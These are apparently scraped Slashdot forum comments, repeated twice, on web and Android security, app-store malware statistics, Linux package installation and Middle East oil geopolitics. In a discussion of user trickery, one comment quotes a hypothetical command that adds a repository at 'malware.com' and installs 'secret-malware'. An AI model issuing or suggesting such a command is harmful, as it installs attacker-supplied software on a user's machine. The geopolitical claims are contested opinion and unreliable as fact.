The problem is not limited to the server trusting the client. The problem is that the client side user *has* to trust the client. Web applications are obviously a subset of all possible client/server types. They are slightly different in that they enforce the use of certain protocols - HTTP, HTTPS, HTML. Your client is a standard web browser. Some people would argue it is harder to secure such a setup than one that uses a custom client, because you no longer have the default choice of a server-side stateful protocol, and because you have to serve HTML (as opposed, to say, restrict the client API to some kind of big-endian bytecoded packet based protocol). Problems like XSS only exist because your client is a standard HTML web browser. Apart from that, you are also exposed to all of the potential bugs in the various platform web browsers, because your "client" is also used to browse random porn sites etc. A custom client, used only for the purpose of connecting to your custom server, does not have this issue of having to deal with data from any old random site on the internet.
You probably shouldn't trust your Intranet - there are simply too many ways for a hostile attacker to connect to your network (e.g. open or hackable wifi, ethernet etc.), and you probably have no worthwhile authentication (MAC addresses can be spoofed, most DHCP servers will hand out an IP to anyone,...). Trusting your intranet also means that, if a single machine on your Intranet is compromised, then your trust circle is broken. Note that recognised security expert Bruce Schneier uses an open network. As he said, "If I configure my computer to be secure regardless of the network it's on, then it simply doesn't matter. And if my computer isn't secure on a public network, securing my own network isn't going to reduce my risk very much."
There is a difference between an unlocked bootloader and an exploit. By your definition, every PC has an "exploit" because it is possible to boot an alternative OS.
Not "always". There is nothing inherently faster about a GUI layout specified using a native XML based format as used in Android etc. versus one specified with HTML, or even one specified imperatively. Both are just markup languages, or ways of specifying a GUI layout, what actually matters is the implementation that converts this description into an in-memory set of data structures, and which then turns these data structures into graphics commands. There is nothing magical about OpenGL that limits its use to non-HTML user interfaces. You can render any graphics, including those specified in HTML, using an OpenGL backend, but most Android and iOS apps do not directly use OpenGL - there are apps that just create a GL window and then render straight into it (eg that would be a common technique for games), but most apps utilise the widget set provided by the native API, which may be in turn rendered to OpenGL.
Can we please use the correct terminology? Webkit is not an operating system. An application launcher is not an operating system. A graphical desktop is not an operating system.
iPhone web apps do use webkit to render the UI though. Are web apps too slow to be usable as a result of this? Did users complain that WebOS was too slow? And if so, was it really slow because of webkit? This article clearly blames the hardware rather than the software, stating that WebOS itself ran twice as fast on iPad level hardware. And if WebOS was too slow to be usable, then how come everyone raved about it once they dropped the price? Very few people are so enthusiastic about platforms that are so "fatally flawed". Was it all just marketing hubris?
They did. Android implements security policies for each app. Requested permissions are defined in a manifest file. Every app runs with a different uid. See Android Security and Permissions:
Android is a privilege-separated operating system, in which each application runs with a distinct system identity (Linux user ID and group ID). Parts of the system are also separated into distinct identities. Linux thereby isolates applications from each other and from the system.
Additional finer-grained security features are provided through a "permission" mechanism that enforces restrictions on the specific operations that a particular process can perform, and per-URI permissions for granting ad-hoc access to specific pieces of data.
Security Architecture
A central design point of the Android security architecture is that no application, by default, has permission to perform any operations that would adversely impact other applications, the operating system, or the user. This includes reading or writing the user's private data (such as contacts or e-mails), reading or writing another application's files, performing network access, keeping the device awake, etc.
Because Android sandboxes applications from each other, applications must explicitly share resources and data. They do this by declaring the permissions they need for additional capabilities not provided by the basic sandbox. Applications statically declare the permissions they require, and the Android system prompts the user for consent at the time the application is installed. Android has no mechanism for granting permissions dynamically (at run-time) because it complicates the user experience to the detriment of security.
...
At install time, Android gives each package a distinct Linux user ID. The identity remains constant for the duration of the package's life on that device. On a different device, the same package may have a different UID; what matters is that each package has a distinct UID on a given device.
the supposed major benefit of Android over iOS, that you can go outside the main app store, is something that no one actually uses?
Power users (read "geeks") use it. Most of them will be using internal corporate repository, development repo, or some other trusted source like the Amazon app store. As far as I can see, the majority of "normal" users have no desire for any of those things, they mostly just want to run Facebook, Ebay, and Angry Birds, so all they need is the official app store. There may be some significant exceptions though: apps which aren't allowed on the official app store (like N64 emulators), and pirated apps; both of these might be quite popular (reliable figures are difficult to get), and are only available from external sources.
Or is this just true when its negative features are brought into the spotlight?
The negative feature of being free to choose to install whatever software I choose on a device that I own? Yes, with freedom comes risk, but I would rather be free to make a mistake than not.
I prefer "He who sacrifices freedom for security deserves neither" to "you shouldn't be allowed to have a choice because you might make the wrong decision"
As far as I know, the vast majority of these "malware apps" are found on random external sites, most of which are supposedly based in China (or at least targeting Chinese users). Certainly, if McAfee is reporting that they have found tens of thousands of these malware apps, then these aren't apps which were available on the official Android Market. The malware that has been found on the official Android Market is in the scale of tens of apps, not thousands.
The difference is that you don't type anything on the command line. The post I was responding to was basically claiming that Linux is more vulnerable because you need to type "sudo apt-get blah" to install a package, so then dumb users can be tricked into typing something like "sudo apt-add-repository http://malware.com/ && sudo apt-get install secret-malware". As (supposedly) opposed to OS X and Windows, where the GUI limits the actions of dumb users to only choosing preapproved software from a predefined repository. At least, that is how I interpreted it. The point I was making is that exactly the same package manager GUIs also exist under Linux, and have done for a very long time. Hence dumb users don't have to (and probably won't) use "sudo apt-get...", they will use the GUI instead, so whatever vulnerabilities exist in this context are exactly the same as on the other operating systems. In fact, I'd go further and say it's worse on the other platforms, as the barrier for installing external software is lower - a "dumb" Linux user has to add an external repository and navigate a package manager, whereas a "dumb" Windows user just has to visit any random web site which will prompt them to download and run an executable file. (Obviously, I am speaking in generalisations, I understand there are PPAs, and that not all Windows users install software from random web sites etc.)
"Number of new fake malware" is not that same as "number of malware infections". With the right tool you can generate an infinite number of malware variants. The statistic from McAfee includes every single individual file that contains some malware - this is like saying that, for an old school virus that infects.exe files on Windows, that every single infection counts as a different "unique malware instance". And if one of these is uploaded to an app store - even an app store that nobody uses, even for a "unique malware instance" that nobody ever installs - then it gets counted by McAfee. The equivalent in the iPhone world would be counting all malware in every random Cydia repository on the web. Obviously there is a big difference between a random repository on the web, and something being distributed by the official repository.
What would actually be useful is to know the number of malware instances that have made it on to app stores that people actually use (eg the official one), how many people installed them, and how long it was before the app was removed. But obviously this number would be much lower, and so generate far fewer page hits.
Actually, I'm surprised the Arab Spring wasn't included. There is certainly a technological angle. We have seen everything from Gadaffi blaming Wikileaks for sparking the revolutions, to a baby girl in Egypt being named "Facebook". Perhaps it was the Year of the Protester after all.
I nominate 2011 as the year of the patent lawsuit. Apple managed to get Samsung's products banned. In return, Samsung eventually got a revenge ruling banning Apple's products. Everybody in the phone industry went lawsuit crazy suing each other, and Microsoft earned more money from patent extortion against a competing product than they did by legitimately selling their own product.
oil in the Caspian basin is estimated to be worth over US $12 trillion. The sudden collapse of the USSR and subsequent opening of the region has led to an intense investment and development scramble by international oil companies. In 1998 Dick Cheney commented that "I can't think of a time when we've had a region emerge as suddenly to become as strategically significant as the Caspian."[29]
I'm not saying that the stability of Eastern Europe is not strategically important, just suggesting that $12 trillion of oil reserves is also pretty important, and a pretty big motivator for a government concerned with that kind of thing.
I don't know who originally reported it (it was over a decade ago), but if you check Google books or scholar you'll find references. books linkscholar link
Sure, it depends on how you define "big" - they may have never actually gone to war, but certain events suggest that there was a lot of bad blood and covert ops between them, and war was never far off:
1) The Taliban's harsh treatment of Afghanistan's Shi'a minority outraged Iran
2) Iran materially and financially supported the Northern Alliance fighting against the Taliban in the Afghan civil war. It is alleged that, as well as supplying them with millions of dollars of weapons and ammunition, plus training, Iran also allowed friendly militias to cross the border and shelter in Iran.
3) The Taliban seized the Iranian consulate and executed Iranian diplomats and intelligence officers. This brought Iran and the Taliban very close to all out war (it was reported that something like a quarter million Iranian troops were massed on the border ready for war, though later reports revise that figure down). 1998_Iranian_diplomats_assassination_in_Afghanistan
4) The ongoing drugs war between Taliban smugglers and Iranian security forces, a war in which thousands of Iranians have been killed (this article claims 3 Iranians are killed every day). The Iranian government is firmly opposed to drugs, and the Taliban gets the majority of its funding from drugs, of which the transit route to Europe through Iran is of particular importance. There has been little space for compromise here.
Really? You would attack me for something my government (who I didn't even vote for) did?
Not saying that I agree with this, but that is the logic used by Osama bin Laden to justify attacking US citizens - if you have democracy, then all citizens are responsible for the actions of the government. Similarly, there appear to be many Americans who would be happy to nuke various cities in the Middle East, killing millions of innocent civilians, because of the behaviour of governments which the citizens of these non-democratic states didn't even get the chance to vote for. People are instinctively tribal, and nationalism is an easy mental justification for war, particularly when it is believed that there won't be any personal repercussions. (If we actually let the troops vote on whether they go to war, or if the middle classes were conscripted, then the picture might be quite different).
Given the size of Iran versus its powerful adversary, Iran seems to be doing okay geopolitically.. In the last decade, two of their biggest regional enemies have been eliminated (Saddam and the Taleban) and replaced with friendly regimes. The myth of Israeli invincibility was destroyed in the Lebanon war, making Israel more reluctant to use their military in the future.
Sure, in an all-out war between the US and Iran, then Iran would be destroyed. But in order to avoid this, the Iranian government only need convince the US that it would it turn suffer unacceptable military and economic losses. It's a game of brinksmanship - the aim (for both sides) is to get as much as you can get without actually going to war.
2. Stop supporting international terrorism. If you want to brutalize your own people that will probably be tolerated indefinitely. But if you spread chaos throughout the region then it forces the US to respond. Don't do that.
Both US and Iran are guilty of playing games of geopolitics and interference in the affairs of other nations. It's a bit rich to accuse Iran of being the one to destabilise the region after the US has invaded and overthrown two major regional governments, leading to a decade long civil war in both countries...
It just forces the US to send resources to the area and focuses additional resources on their country. None of that is good for Iran.
Forcing your enemy to squander resources is a kind of win. Posturing is also a kind of win, like the teenager showing off his muscles and martial skills in the school yard, it sends a particular message to be wary of messing with this kid.
On January 10, Swiss-based Manas Petroleum Corporation broke the news. Gustavson Associates LLC's Resource Evaluation identified large prospects of oil and gas reserves in Albania, close to Kosovo. They are in areas called blocks A, B, C, D and E, encompassing about 780,000 acres along the northwest to southeast "trending (geological) fold belt of northwestern Albania."
In November 1998, Bill Richardson, then US energy secretary, spelt out his policy on the extraction and transport of Caspian oil. "This is about America's energy security," he explained. "It's also about preventing strategic inroads by those who don't share our values. We're trying to move these newly independent countries toward the west.
"We would like to see them reliant on western commercial and political interests rather than going another way. We've made a substantial political investment in the Caspian, and it's very important to us that both the pipeline map and the politics come out right."
"Stolen" is a confrontational term, but put it this way: if China backed an armed revolution inside the US which successfully overthrew the government and installed a military dictatorship, and then contracts were signed that gave Chinese corporations access and control over the natural resources of the US, would you consider this to be okay? Or would you consider that, somehow, the natural resources were being "stolen"?
There are many references claiming that this has happened, see war is a racket, the war on democracy etc. There was even an honest politician from one country who was vilified because he stated straight up that they were part of the Iraq coalition in exchange for corporate access to oil.
Slashdot Mirror
The problem is not limited to the server trusting the client. The problem is that the client side user *has* to trust the client. Web applications are obviously a subset of all possible client/server types. They are slightly different in that they enforce the use of certain protocols - HTTP, HTTPS, HTML. Your client is a standard web browser. Some people would argue it is harder to secure such a setup than one that uses a custom client, because you no longer have the default choice of a server-side stateful protocol, and because you have to serve HTML (as opposed, to say, restrict the client API to some kind of big-endian bytecoded packet based protocol). Problems like XSS only exist because your client is a standard HTML web browser. Apart from that, you are also exposed to all of the potential bugs in the various platform web browsers, because your "client" is also used to browse random porn sites etc. A custom client, used only for the purpose of connecting to your custom server, does not have this issue of having to deal with data from any old random site on the internet.
You probably shouldn't trust your Intranet - there are simply too many ways for a hostile attacker to connect to your network (e.g. open or hackable wifi, ethernet etc.), and you probably have no worthwhile authentication (MAC addresses can be spoofed, most DHCP servers will hand out an IP to anyone,...). Trusting your intranet also means that, if a single machine on your Intranet is compromised, then your trust circle is broken. Note that recognised security expert Bruce Schneier uses an open network. As he said, "If I configure my computer to be secure regardless of the network it's on, then it simply doesn't matter. And if my computer isn't secure on a public network, securing my own network isn't going to reduce my risk very much."
There is a difference between an unlocked bootloader and an exploit. By your definition, every PC has an "exploit" because it is possible to boot an alternative OS.
Not "always". There is nothing inherently faster about a GUI layout specified using a native XML based format as used in Android etc. versus one specified with HTML, or even one specified imperatively. Both are just markup languages, or ways of specifying a GUI layout, what actually matters is the implementation that converts this description into an in-memory set of data structures, and which then turns these data structures into graphics commands. There is nothing magical about OpenGL that limits its use to non-HTML user interfaces. You can render any graphics, including those specified in HTML, using an OpenGL backend, but most Android and iOS apps do not directly use OpenGL - there are apps that just create a GL window and then render straight into it (eg that would be a common technique for games), but most apps utilise the widget set provided by the native API, which may be in turn rendered to OpenGL.
Can we please use the correct terminology? Webkit is not an operating system. An application launcher is not an operating system. A graphical desktop is not an operating system.
iPhone web apps do use webkit to render the UI though. Are web apps too slow to be usable as a result of this? Did users complain that WebOS was too slow? And if so, was it really slow because of webkit? This article clearly blames the hardware rather than the software, stating that WebOS itself ran twice as fast on iPad level hardware. And if WebOS was too slow to be usable, then how come everyone raved about it once they dropped the price? Very few people are so enthusiastic about platforms that are so "fatally flawed". Was it all just marketing hubris?
Android is a privilege-separated operating system, in which each application runs with a distinct system identity (Linux user ID and group ID). Parts of the system are also separated into distinct identities. Linux thereby isolates applications from each other and from the system.
Additional finer-grained security features are provided through a "permission" mechanism that enforces restrictions on the specific operations that a particular process can perform, and per-URI permissions for granting ad-hoc access to specific pieces of data. Security Architecture
A central design point of the Android security architecture is that no application, by default, has permission to perform any operations that would adversely impact other applications, the operating system, or the user. This includes reading or writing the user's private data (such as contacts or e-mails), reading or writing another application's files, performing network access, keeping the device awake, etc.
Because Android sandboxes applications from each other, applications must explicitly share resources and data. They do this by declaring the permissions they need for additional capabilities not provided by the basic sandbox. Applications statically declare the permissions they require, and the Android system prompts the user for consent at the time the application is installed. Android has no mechanism for granting permissions dynamically (at run-time) because it complicates the user experience to the detriment of security.
...
At install time, Android gives each package a distinct Linux user ID. The identity remains constant for the duration of the package's life on that device. On a different device, the same package may have a different UID; what matters is that each package has a distinct UID on a given device.
Security policies can be configured by file paths and processes as well as user id. See Security-Enhanced Linux, AppArmor, etc.
the supposed major benefit of Android over iOS, that you can go outside the main app store, is something that no one actually uses?
Power users (read "geeks") use it. Most of them will be using internal corporate repository, development repo, or some other trusted source like the Amazon app store. As far as I can see, the majority of "normal" users have no desire for any of those things, they mostly just want to run Facebook, Ebay, and Angry Birds, so all they need is the official app store. There may be some significant exceptions though: apps which aren't allowed on the official app store (like N64 emulators), and pirated apps; both of these might be quite popular (reliable figures are difficult to get), and are only available from external sources.
Or is this just true when its negative features are brought into the spotlight?
The negative feature of being free to choose to install whatever software I choose on a device that I own? Yes, with freedom comes risk, but I would rather be free to make a mistake than not.
I prefer "He who sacrifices freedom for security deserves neither" to "you shouldn't be allowed to have a choice because you might make the wrong decision"
the iOS App Store and KNOW all that stuff has already been done for me
Malicious app penetrates iTunes store to test security Miller's malware was on the Apple app store for over 2 months, so clearly the Apple store is vulnerable to the same sort of shenanigans as the Android market.
Apple has never had to exercise its "Kill Switch" option for an App already in the Wild
From the BBC article: "Apple declined to comment. It also removed the app and barred the developer from its store."
As far as I know, the vast majority of these "malware apps" are found on random external sites, most of which are supposedly based in China (or at least targeting Chinese users). Certainly, if McAfee is reporting that they have found tens of thousands of these malware apps, then these aren't apps which were available on the official Android Market. The malware that has been found on the official Android Market is in the scale of tens of apps, not thousands.
The difference is that you don't type anything on the command line. The post I was responding to was basically claiming that Linux is more vulnerable because you need to type "sudo apt-get blah" to install a package, so then dumb users can be tricked into typing something like "sudo apt-add-repository http://malware.com/ && sudo apt-get install secret-malware". As (supposedly) opposed to OS X and Windows, where the GUI limits the actions of dumb users to only choosing preapproved software from a predefined repository. At least, that is how I interpreted it. The point I was making is that exactly the same package manager GUIs also exist under Linux, and have done for a very long time. Hence dumb users don't have to (and probably won't) use "sudo apt-get ...", they will use the GUI instead, so whatever vulnerabilities exist in this context are exactly the same as on the other operating systems. In fact, I'd go further and say it's worse on the other platforms, as the barrier for installing external software is lower - a "dumb" Linux user has to add an external repository and navigate a package manager, whereas a "dumb" Windows user just has to visit any random web site which will prompt them to download and run an executable file. (Obviously, I am speaking in generalisations, I understand there are PPAs, and that not all Windows users install software from random web sites etc.)
You don't need sudo to install apps on Android.
"Number of new fake malware" is not that same as "number of malware infections". With the right tool you can generate an infinite number of malware variants. The statistic from McAfee includes every single individual file that contains some malware - this is like saying that, for an old school virus that infects .exe files on Windows, that every single infection counts as a different "unique malware instance". And if one of these is uploaded to an app store - even an app store that nobody uses, even for a "unique malware instance" that nobody ever installs - then it gets counted by McAfee. The equivalent in the iPhone world would be counting all malware in every random Cydia repository on the web. Obviously there is a big difference between a random repository on the web, and something being distributed by the official repository.
What would actually be useful is to know the number of malware instances that have made it on to app stores that people actually use (eg the official one), how many people installed them, and how long it was before the app was removed. But obviously this number would be much lower, and so generate far fewer page hits.
When you need 'sudo' to install a new app.
You don't. There have been GUI application installers on Linux for over a decade.
Microsoft never released the source code for free, though. The probability of uptake is higher if other browsers are given a free implementation.
Actually, I'm surprised the Arab Spring wasn't included. There is certainly a technological angle. We have seen everything from Gadaffi blaming Wikileaks for sparking the revolutions, to a baby girl in Egypt being named "Facebook". Perhaps it was the Year of the Protester after all.
I nominate 2011 as the year of the patent lawsuit. Apple managed to get Samsung's products banned. In return, Samsung eventually got a revenge ruling banning Apple's products. Everybody in the phone industry went lawsuit crazy suing each other, and Microsoft earned more money from patent extortion against a competing product than they did by legitimately selling their own product.
oil in the Caspian basin is estimated to be worth over US $12 trillion. The sudden collapse of the USSR and subsequent opening of the region has led to an intense investment and development scramble by international oil companies. In 1998 Dick Cheney commented that "I can't think of a time when we've had a region emerge as suddenly to become as strategically significant as the Caspian."[29]
I'm not saying that the stability of Eastern Europe is not strategically important, just suggesting that $12 trillion of oil reserves is also pretty important, and a pretty big motivator for a government concerned with that kind of thing.
I don't know who originally reported it (it was over a decade ago), but if you check Google books or scholar you'll find references. books link scholar link
Taliban was never a "big" enemy.
Sure, it depends on how you define "big" - they may have never actually gone to war, but certain events suggest that there was a lot of bad blood and covert ops between them, and war was never far off:
1) The Taliban's harsh treatment of Afghanistan's Shi'a minority outraged Iran
2) Iran materially and financially supported the Northern Alliance fighting against the Taliban in the Afghan civil war. It is alleged that, as well as supplying them with millions of dollars of weapons and ammunition, plus training, Iran also allowed friendly militias to cross the border and shelter in Iran.
3) The Taliban seized the Iranian consulate and executed Iranian diplomats and intelligence officers. This brought Iran and the Taliban very close to all out war (it was reported that something like a quarter million Iranian troops were massed on the border ready for war, though later reports revise that figure down). 1998_Iranian_diplomats_assassination_in_Afghanistan
4) The ongoing drugs war between Taliban smugglers and Iranian security forces, a war in which thousands of Iranians have been killed (this article claims 3 Iranians are killed every day). The Iranian government is firmly opposed to drugs, and the Taliban gets the majority of its funding from drugs, of which the transit route to Europe through Iran is of particular importance. There has been little space for compromise here.
Really? You would attack me for something my government (who I didn't even vote for) did?
Not saying that I agree with this, but that is the logic used by Osama bin Laden to justify attacking US citizens - if you have democracy, then all citizens are responsible for the actions of the government. Similarly, there appear to be many Americans who would be happy to nuke various cities in the Middle East, killing millions of innocent civilians, because of the behaviour of governments which the citizens of these non-democratic states didn't even get the chance to vote for. People are instinctively tribal, and nationalism is an easy mental justification for war, particularly when it is believed that there won't be any personal repercussions. (If we actually let the troops vote on whether they go to war, or if the middle classes were conscripted, then the picture might be quite different).
Given the size of Iran versus its powerful adversary, Iran seems to be doing okay geopolitically.. In the last decade, two of their biggest regional enemies have been eliminated (Saddam and the Taleban) and replaced with friendly regimes. The myth of Israeli invincibility was destroyed in the Lebanon war, making Israel more reluctant to use their military in the future.
Sure, in an all-out war between the US and Iran, then Iran would be destroyed. But in order to avoid this, the Iranian government only need convince the US that it would it turn suffer unacceptable military and economic losses. It's a game of brinksmanship - the aim (for both sides) is to get as much as you can get without actually going to war.
2. Stop supporting international terrorism. If you want to brutalize your own people that will probably be tolerated indefinitely. But if you spread chaos throughout the region then it forces the US to respond. Don't do that.
Both US and Iran are guilty of playing games of geopolitics and interference in the affairs of other nations. It's a bit rich to accuse Iran of being the one to destabilise the region after the US has invaded and overthrown two major regional governments, leading to a decade long civil war in both countries...
It just forces the US to send resources to the area and focuses additional resources on their country. None of that is good for Iran.
Forcing your enemy to squander resources is a kind of win. Posturing is also a kind of win, like the teenager showing off his muscles and martial skills in the school yard, it sends a particular message to be wary of messing with this kid.
On January 10, Swiss-based Manas Petroleum Corporation broke the news. Gustavson Associates LLC's Resource Evaluation identified large prospects of oil and gas reserves in Albania, close to Kosovo. They are in areas called blocks A, B, C, D and E, encompassing about 780,000 acres along the northwest to southeast "trending (geological) fold belt of northwestern Albania."
A Discreet Deal in the Pipeline
In November 1998, Bill Richardson, then US energy secretary, spelt out his policy on the extraction and transport of Caspian oil. "This is about America's energy security," he explained. "It's also about preventing strategic inroads by those who don't share our values. We're trying to move these newly independent countries toward the west. "We would like to see them reliant on western commercial and political interests rather than going another way. We've made a substantial political investment in the Caspian, and it's very important to us that both the pipeline map and the politics come out right."
"Stolen" is a confrontational term, but put it this way: if China backed an armed revolution inside the US which successfully overthrew the government and installed a military dictatorship, and then contracts were signed that gave Chinese corporations access and control over the natural resources of the US, would you consider this to be okay? Or would you consider that, somehow, the natural resources were being "stolen"?
There are many references claiming that this has happened, see war is a racket, the war on democracy etc. There was even an honest politician from one country who was vilified because he stated straight up that they were part of the Iraq coalition in exchange for corporate access to oil.